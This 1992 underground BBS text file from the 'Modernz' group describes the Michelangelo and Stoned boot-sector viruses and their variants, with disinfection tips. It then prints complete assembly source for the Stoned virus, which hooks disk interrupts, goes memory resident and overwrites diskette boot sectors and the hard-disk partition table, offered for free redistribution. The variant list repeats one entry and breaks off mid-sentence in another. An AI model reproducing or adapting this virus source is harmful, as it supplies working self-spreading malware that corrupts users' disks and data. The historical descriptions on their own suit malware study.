Copy Link
Add to Bookmark
Report
Modernz 33a
><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
*********************************************************
* *
* The Michelangelo & Stoned Virus *
* *
* *
* Another Modernz Presentation *
* *
* by *
* Digital-demon *
* *
* (C)opyright March 5th, 1992 *
* *
*********************************************************
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
*******************************************************************************
The Modernz can be contacted at:
MATRIX BBS
WOK-NOW!
World of Kaos NOW!
World of Knowledge NOW!
St. Dismis Institute
- Sysops: Wintermute
Digital-demon
(908) 905-6691
(908) WOK-NOW!
(908) 458-xxxx
1200/2400/4800/9600
14400/19200/38400
Home of Modernz Text Philez
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
TANSTAAFL
The Church of Rodney
- Sysop: Tal Meta
(908) 830-TANJ
(908) 830-8265
Home of TANJ Text Philez
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
Syndicate Bbs
Sysop: Hegz
(908)506-6651
300/1200/2400/4800/9600
14400/19200/38400
Modernz Site
TLS HQ
<><><><><><><><><><><><><><<><<><><><><><><><><><><><><><><><><><><><><><><><><
The Global Intelligence Center
World UASI Headquarters!
Pennsylvania SANsite!
(412) 475-4969 300/1200/2400/9600
24 Hours! SysOp: The Road Warrior
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
The Lost Realm
Western PA UASI site!
Western PA. SANfranchise
(412) 588-5056 300/1200/2400
SysOp: Orion Buster
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
The Last Outpost
PowerBBS Support Board
UASI ALPHA Division
NorthWestern PA UASI site!
(412) 662-0769 300/1200/2400
24 hours! SysOp: The Almighty Kilroy
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
Hellfire BBS
SANctuary World Headquarters!
New Jersey UASI site!
(908) 495-3926 300/1200/2400
24 hours! SysOp: Red
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
BlitzKrieg BBS
Home of TAP
(502)499-8933
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
The Michelangelo virus was first reported in April, 1991 in Sweden
and the Netherlands. The first usable sample of this virus was
actually received in June, 1991. Michelangelo is a memory
resident infector of diskette boot sectors and the hard disk partition
table. It is roughly based on the Stoned virus, though very different
in its behavior.
The Michelangelo virus becomes memory resident the first time the
system is attempted to be booted with a Michelangelo infected
disk. Regardless of whether this boot is successful, Michelangelo will
become memory resident. Total system and available free memory, as
measured by the DOS CHKDSK program will typically decrease by
2,048 bytes. Michelangelo will be resident at the top of system
memory but below the 640K DOS boundary. Interrupt 12's return will
be moved to insure that Michelangelo in memory is not overwritten.
Once Michaelangelo is memory resident, it will infect diskette boot
sectors as they are accessed. It will also infect the hard disk
partition table when the user attempts to access a file on the hard
disk.
On 360K 5.25" diskettes, the original boot sector will be moved by
the virus to sector 11, the last sector in the root directory. On
1.2M 5.25" diskettes, the original boot sector will be relocated to
sector 28, part of the root directory. Since the original boot
sector now resides in the root directory, any entries which happened
to be in the overwritten sector of the root directory will be lost.
Partition table infections will result in the original partition
table having been moved to Side 0, Cylinder 0, Sector 7 on the
hard disk.
Michelangelo activates on March 6, at which time it will format the
system hard disk by overwriting it with random characters from
system memory.
-------------------------------------------------------------------------------
The Stoned virus was first reported in Wellington, New Zealand in
early 1988. The original virus only infected 360KB 5-1/4"
diskettes, doing no overt damage. The original diskette-only
infector is extinct, however, and all known variants of this virus
are capable of infecting the hard disk partition table as well as
may damage directory or FAT information. Most variants of this
virus have only minor modifications, usually in what the message is
that the virus may display on boot.
When a computer system is booted with a Stoned infected disk, this
virus will install itself memory resident at the top of system
memory. The interrupt 12 return will be moved, and ChkDsk will
indicate that the computer system as 2K less total memory than what
is installed. If the system boot was from a diskette, the virus
will also attempt to infect the hard disk partition table, if it was
not previously infected.
During the boot process, the Stoned virus may display a message.
The message is displayed more or less on a random basis. The most
common text for the message is:
"Your computer is now stoned."
Or:
"Your PC is now Stoned!"
After Stoned is memory resident, it will infect diskettes as they
are accessed on the system. When Stoned infects a diskette, it
moves the original boot sector (sector 0) to sector 11. The Stoned
virus then copies itself into sector 0. Since sector 11 is
normally part of the diskette root directory on 360K 5.25"
diskettes, any files which had their directory entries located in
this sector will be lost. Some versions of DOS have sector 11 as
part of the File Allocation Table, which may also result in the
disk's FAT being corrupted.
When Stoned infects that system hard disk, it copies the hard
disk's original partition table to side 0, cyl 0, sector 7. A copy
of the Stoned virus is then placed at side 0, cyl 0, sector 1, the
original location of the hard disk partition table. If the hard
disk was formatted with software which starts the boot sector, file
allocation table, or disk directory on side 0, cyl 0 right after
the partition table, the hard disk may be corrupted as well.
In order to disinfect a system infected with the Stoned virus, the
system must be powered off and booted with an uninfected, write-
protected boot diskette. If this is not done, the virus may
re-infect diskettes as soon as they are disinfected.
There are many programs which can disinfect Stoned infected
diskettes and hard disks. To successfully use one of these, follow
the instructions with the program.
To remove Stoned manually, the DOS SYS command can be used on
5.25" 360K diskettes. On the hard disk, the original partition
table must be copied back to side 0, cyl 0, sector 1. This can be
performed with Norton Utilities, or other sector editors.
Known variant(s) of Stoned are:
Deunis : Based on the Stoned virus, Deunis is a variant received
from Spain in July, 1991. The text contained within the
virus is now:
"*Deun*s abras* tu Cpu!"
"(c) IMAN4"
PS-Stoned: Based on the Stoned virus, PS-Stoned is a variant which
has been altered to avoid detection. Unlike most
members of the Stoned Family, PS-Stoned does not contain
a message, and does not display any message when the
system is booted from an infected disk. This variant
will infect the boot sector of both normal and
high-density diskettes, as well as the hard disk
partition table. In the case of the partition table,
the original partition table is moved to cylinder 0,
side 0, sector 17. On low density diskettes, the
original boot sector is moved to sector 11, while on
high density diskettes it can be found at sector 16.
This variant was originally received in February, 1991,
from New Brunswick, Canada after being isolated at a
university. As of May, 1991, no anti-viral products
detect this variant which can be just about invisible on
infected systems.
Rostov: Similar to Stoned-B, this variant does not display any
message. It contains the text: "Non-system disk" and
"Replace and strike". Submitted in December, 1990, origin
unknown.
Sex Revolution V1.1: Submitted in December, 1990, this variant is
similar to Stoned-B. This variant may display
the following message:
"EXPORT OF SEX REVOLUTION ver. 1.1"
Sex Revolution V2.0: Similar to Sex Revolution V1.1, the message
has been changed to:
"EXPORT OF SEX REVOLUTION ver. 2.0"
Stoned-A: Same as Stoned above, but does not infect the system hard
This is the original virus and is now extint. The text
found in the boot sector of the infected diskettes is:
"Your computer is now stoned. Legalize Marijuana".
The "Legalize Marijuana" portion of the text is not
displayed.
Stoned-B: Same as Stoned indicated above. Systems with RLL
controllers may experience frequent system hangs. Text
typically found in this variant is: "Your computer is now
stoned. Legalise Marijuana". The "Legalise Marijuana"
may also be in capital letters, or may be partially
overwritten. It is not displayed.
Stoned-C: same as Stoned, except that the message has been
removed.
Stoned-D: same as Stoned, with the exception that this variant
can infect high density 3.5" and 5.25" diskettes.
Stoned-E: Similar to Stoned-B, this variant now emits a "beep"
Stoned-E: Similar to Stoned-B, this variant now emits a "beep"
through the system speaker when the following message is
displayed: "Your PC is now Stoned!" The Text "LEGALISE
MARIJUANA!" can also be found in the boot sector and
system partition table.
Stoned-F: Similar to Stoned-E, this variant also emits a "beep"
through the system speaker when its message is displayed. The
displayed message is: "Twoj PC jest teraz be!" The text
"LEGALISE MARIJUANA?" can also be found in the boot sector and
the partition table.
Stoned II: Based on Stoned-B, this variant has been modified to avoid
detection by anti-viral utilities. Since its isolation in
June, 1990, most utilities can now detect this variant. Text
in the virus has been changed to: "Your PC is now Stoned!
Version 2" Or: "Donald Duck is a lie." The "Version 2" of the
text may be corrupted as well.
-------------------------------------------------------------------------------
The "New Zealand Virus".
Also called - Stoned, Marijuana, San Diego Virus, Smithsonian Virus
CODE SEGMENT
ASSUME CS:CODE
WORK_SPACE EQU 512
MAXIMUM_SIZE EQU 1BEH
VIRUS PROC NEAR
DB 0EAH ;JMP 07C0:0005
DW 5,7C0H
JMP INSTALL
; DRIVE_LETTER INDICATES BOOT DISK, 0 = A:, 2 = C:
DRIVE_LETTER DB 0
OLD_13 LABEL DWORD
OFFS DW ?
SEGM DW ?
NEW_ADDRESS LABEL DWORD
DW CONTINUE
NEW_SEGMENT DW 0
REBOOT LABEL DWORD
DW 7C00H,0
NEW_13:
PUSH DS
PUSH AX
CMP AH,2
JC SPINNING
CMP AH,4
JNC SPINNING
OR DL,DL ; IS IT DRIVE A:?
JNZ SPINNING ; JUMP IF NOT
XOR AX,AX
MOV DS,AX
MOV AL,DS:43FH ; IS DRIVE MOTOR SPINNING?
TEST AL,1 ; IF YES THEN JUMP
JNZ SPINNING
; INT13 REQUEST IS FOR READ OR WRITE TO A: - MOTOR NOT YET STARTED.
CALL INFECT ; NOT SPINNING - INFECT
SPINNING:
POP AX
POP DS
JMP CS:[OLD_13]
INFECT:
PUSH BX ; SAVE REGISTERS
PUSH CX
PUSH DX
PUSH ES
PUSH SI
PUSH DI
MOV SI,4 ; MAKE FOUR ATTEMPTS
GET_BOOT_SECTOR:
MOV AX,201H ; READ SECTOR
PUSH CS
POP ES
MOV BX,OFFSET WORK_SPACE
XOR CX,CX ; TRACK 0, SECTOR 0
MOV DX,CX ; HEAD 0, DRIVE 0
INC CX
PUSHF
CALL CS:[OLD_13]
JNC BOOT_IS_DONE ; READ OK.
XOR AX,AX ; DRIVE RESET
PUSHF
CALL CS:[OLD_13]
DEC SI ; COUNT NUMBER OF TRIES
JNZ GET_BOOT_SECTOR ; LOOP
JMP FINISH
BOOT_IS_DONE:
XOR SI,SI ; CODE SEGMENT START
MOV DI,OFFSET WORK_SPACE ; POINTER TO BOOT SECTOR
CLD
PUSH CS
POP DS
LODSW
CMP AX,DS:[DI] ; OURS?
JNZ CREATE_BOOT ; NO, CREATE BOOT
LODSW ; RETRY
CMP AX,DS:[DI+2] ; OURS?
JZ FINISH ; NO, FINISH UP
CREATE_BOOT:
MOV AX,301H ; WRITE ORIGINAL BOOT SECTOR FROM BUFFER
MOV BX,OFFSET WORK_SPACE
MOV CL,3
MOV DH,1
PUSHF
CALL CS:[OLD_13] ; WRITE
JC FINISH
MOV AX,301H
XOR BX,BX
MOV CL,01
XOR DX,DX
PUSHF
CALL CS:[OLD_13]
FINISH:
POP DI ; RESTORE REGISTERS
POP SI
POP ES
POP DX
POP CX
POP BX
RET
INSTALL:
XOR AX,AX
MOV DS,AX
CLI
MOV SS,AX
MOV SP,7C00H
STI ; ENABLE INTERRUPTS
MOV AX,DS:4CH ; SAVE OLD 13H
MOV DS:[OFFS+7C00H],AX
MOV AX,DS:4EH
MOV DS:[SEGM+7C00H],AX
MOV AX,DS:413H ; MEMORY AVAILABLE
DEC AX
DEC AX
MOV DS:413H,AX
MOV CL,6
SHL AX,CL
MOV ES,AX ; ES: = FREE MEMORY ADDRESS
MOV DS:[NEW_SEGMENT+7C00H],AX ; PUT IT INTO NEW JUMP VECTOR
MOV AX,OFFSET NEW_13 ; INSTALL NEW VIRUS VECTOR
MOV DS:4CH,AX
MOV DS:4EH,ES
MOV CX,OFFSET ENDOFPROGMEM
PUSH CS
POP DS ; DS POINTS TO OUR CODE SEGMENT
XOR SI,SI ; SI POINTS TO 0
MOV DI,SI ; DI POINTS TO 0
CLD ; SET DIRECTION FLAG TO INCREMENT
REP MOVSB ; MOVE OURSELVES INTO HIGH MEMORY!
JMP NEW_ADDRESS ; THIS JUMP TRANSFERS TO CONTINUE BUT IN HIGH MEM
; THE FOLLOWING CODE IS EXECUTED AFTER BEING MOVED TO HIGH MEMORY
; EXECUTION IS VIA THE JUMP TO NEW_ADDRESS
CONTINUE:
MOV AX,0 ; RESET DISK SYSTEM
INT 13H ; THIS IS THE INFECTED INT 13H
XOR AX,AX ; READ REAL BOOT SECTOR
MOV ES,AX
MOV AX,201H
MOV BX,7C00H ; INTO THE BOOT AREA OF RAM
CMP DRIVE_LETTER,0
JZ BOOT_A
BOOT_C:
MOV CX,0002H ; FROM SECTOR 2 TRACK 0 HEAD 0 FOR FIRST HD
MOV DX,0080H
INT 13H
JMP QUITPROG
BOOT_A:
MOV CX,0003H ; FROM SECTOR 3 TRACK 0 HEAD 1 FOR DRIVE A:
MOV DX,0100H
INT 13H
JC QUITPROG ; FAILED READ!
TEST BYTE PTR ES:46CH,7 ; CHECK SYSTEM CLOCK LAST 3 BITS
JNZ NOMESSAGE
MOV SI,OFFSET MESSAGE ; DS IS POINTING TO 7C0:000 WHICH
PUSH CS
POP DS
MSGLOOP:
LODSB ; ALSO HAS THE TEXT
OR AL,AL
JZ NOMESSAGE
MOV AH,14
MOV BH,0
INT 10H
JMP MSGLOOP
NOMESSAGE:
PUSH CS
POP ES
MOV AX,201H
MOV BX,OFFSET WORK_SPACE ; READ BOOT SECTOR FROM HARD DISK
MOV CL,1
MOV DX,0080H
INT 13H
JC QUITPROG ; BAD READ - SO JUMP
PUSH CS
POP DS
MOV SI,OFFSET WORK_SPACE ; SOURCE IS THE BOOT SECTOR
MOV DI,0 ; DESTINATION IS OUR OWN CODE
LODSW ; MOV AX,DS:[SI]
; ADD SI,2
CMP AX,DS:[DI] ; VIRUS?
JNZ SAVEBOOT ; JUMP IF NOT
LODSW ; MOV AX,DS:[SI]
; ADD SI,2
CMP AX,DS:[DI+2] ; HAS IT GOT A VIRUS?
JNZ SAVEBOOT
QUITPROG:
MOV DRIVE_LETTER,0 ; YES - SO BOOT DRIVE 0 FOR A>
JMP REBOOT ; THIS JUMPS TO 0:7C00H TO CONTINUE BOOT CODE
SAVEBOOT:
MOV DRIVE_LETTER,2 ; DRIVE 2 FOR C>
MOV AX,301H ; GONNA WRITE
MOV BX,OFFSET WORK_SPACE ; OLD BOOT SECTOR
MOV CX,0007H ; TO SECTOR 7
MOV DX,0080H ; OF DRIVE C>
INT 13H
JC QUITPROG
PUSH CS
POP DS
PUSH CS
POP ES
MOV SI,OFFSET WORK_SPACE+MAXIMUM_SIZE
MOV DI,MAXIMUM_SIZE
MOV CX,400H-MAXIMUM_SIZE
REP MOVSB ; SI -> DI AND INC BOTH CX TIMES
MOV AX,301H ; GONNA WRITE BOOT SECTOR
XOR BX,BX ; FROM TOP OF OUR CODE
INC CL ; SECTOR 1
; MOV DX,0080H ;<-- DX IS LEFT OVER FROM ABOVE
INT 13H ; DO IT
JMP QUITPROG
MESSAGE:
DB 7,'Your PC is now Stoned!',7,13,10,10,0
DB 'LEGALISE MARIJUANA!' ; This bit doesn't display!
ENDOFPROGMEM:
VIRUS ENDP
CODE ENDS
END VIRUS
|-|-|-|-|-|-|=|=|=|=|=|=|=|=|=|=|=|-|-|-|-|-|-|-|-|-|-|-|=|=|=|=|=|=|
Disclaimer
~~~~~~~~~~
This publication is for informational purposes ONLY.
In no way are the above authors, or organizations, liable for the
use or misuse of the information contained herein. The Underground Agent
Society Inc., The Agents Underground Notebooks, UASI, UASI Magazine, The
Global Intelligence Center, and The Global Intelligence Underground are all
unregistered trademarks of UASI. Distribution to EVERYWHERE is ENCOURAGED!
Hellfire BBS, SANctuary Magazine, SANphilez, and SANsites are all
unregistered trademarks of SANctuary. Matrix BBS, Modernz, and others are
unregistered trademarks of Modernz. Distribution of these text files is
allowed...and downright encouraged.
|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|=|-|
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
<*> <*>
<*> THIS HAS BEEN A MODERNZ PRESENTATION <*>
<*> <*>
<*> SEE YOU ALL AT MATRIX BBS (908)905-6691 <*>
<*> <*>
<*> NON-PURSUITABLE WITHOUT A GLOBAL <*>
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
